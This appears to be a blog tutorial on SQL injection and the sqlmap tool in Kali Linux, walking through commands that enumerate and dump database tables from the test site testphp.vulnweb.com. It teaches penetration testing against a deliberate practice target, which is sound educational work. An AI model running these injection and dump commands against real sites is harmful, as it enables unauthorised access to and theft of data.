sqlmap Tutorial Using kali linux

What is SQL Injection?

SQL injection is an attack technique that exploits a security vulnerability occurring in the database layer of an application.  Hackers use injections to obtain unauthorized access to the underlying data, structure, and DBMS.  It is one of the most common web application vulnerabilities.

SQL Injections happen when a developer accepts user input that is directly placed into a SQL Statement and doesn’t properly validate and filter out dangerous characters. This can allow an attacker to alter SQL statements passed to the database as parameters and enable her to not only steal data from your database, but also modify and delete it.

What is SQLmap?

“it is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.”

It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

 Features of sqlmap

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.

• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.

• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. 

• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

• Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.

• Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.

• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.

• Support for database process user privilege escalation via Metasploit’s Meterpreter getsystem command.

Hacking web application using sqlmap

First of all you need to Kali or backtrack Linux and running on your computer or laptop. Other linux os might be work but you need to install sqlmap separately while kali linux provides it as inbuilt package. If you don’t have kali linux installed in your computer then you can use Bootable USB or kali linux LIVE CD.

Now Boot your computer using kali linux after that Find the sqlmap from the application which is located in 

Application → Database assessment → sqlmap

Type into the terminal following command

Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1

 

When you enter this command it will displays the some message. Sqlmap process the URL and test some query on that URL and it will find that entered URL is vulnerable or not. Sometimes sqlmap ask the permission as yes/no like “it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payload specific for other DBMSes? [Y/n]” you can enter your choice as "y" or "n".

(Here Note that sqlmap provides info message as green color warning message as yellow color and error message as red color.)

Now the turn the Enumeration  of website database.

Enter the following command to find the available database of the website.

Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

The following command finds the available databases from the entered website, here you can see that two database available on the following website.here --dbs option is used to Enumerate DBMS databases.

Now we choose the acuart database to Enumerates tables, this will shows that how many tables are into the acuart database. so first you will specify that which database table you want to enumerate so you can use the -D <Database name> and Replace --dbs to --tables.

  Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result of above command is looks like 

Database: acuart
[8 tables]
+-----------+
| artists       |
| carts         |
| categ        |
| featured    |
| guestbook |
| pictures     |
| products    |
| users          |
+-------------+

Now you have the list of the tables of the acuart database, now choose any table from the above 8 tables.

Here i will choose the categ table and try to find the columns and table structure of the categ table. to enumerates the columns of the categ table enter the following command.

Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T categ --Columns

Here in the categ table 3 columns are available output are displayed into the above shot. now you have target database, tables and table structure so it's time to dumping the data from the specific table.

Now we will getting data from the multiple columns as well as single columns also, here we will specify the database with -D, table with -T and columns with -C, multiple columns are separated by comma. --dump is use to get all data from specified columns. The final command looks like

 Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T categ -C cat_id,cdesc,cname --dump

Here is the Result of above command. 

Here total 4 entry into the categ table and those all entry are copied into the categ.csv file which is located in ./sqlmap directory.

To get this file you need to copy that file into the somewhere into your computer, you will need to change directory from the following command and reach the dump directory.

 cd .sqlmap/output/testphp.vulnweb.com/dump/acuart

After reach acuart directory type ls command to get list of the files and directory into the current directory. now copy the categ.csv file into the root directory so you can use it for further processing, enter the following command.

cp categ.csv /root

 The cd and cp both commands are shown in bellow shot.

LEGAL DISCLAIMER

If you do not fully understand something on this material, then go outside of here! refer to the laws in your province/country before accessing, using, or in any other way utilizing these material.

These material are for only educational and research purpose only. we are not responsible for any kind of misuse of this material.

If you Like This Please Share With Your Friends!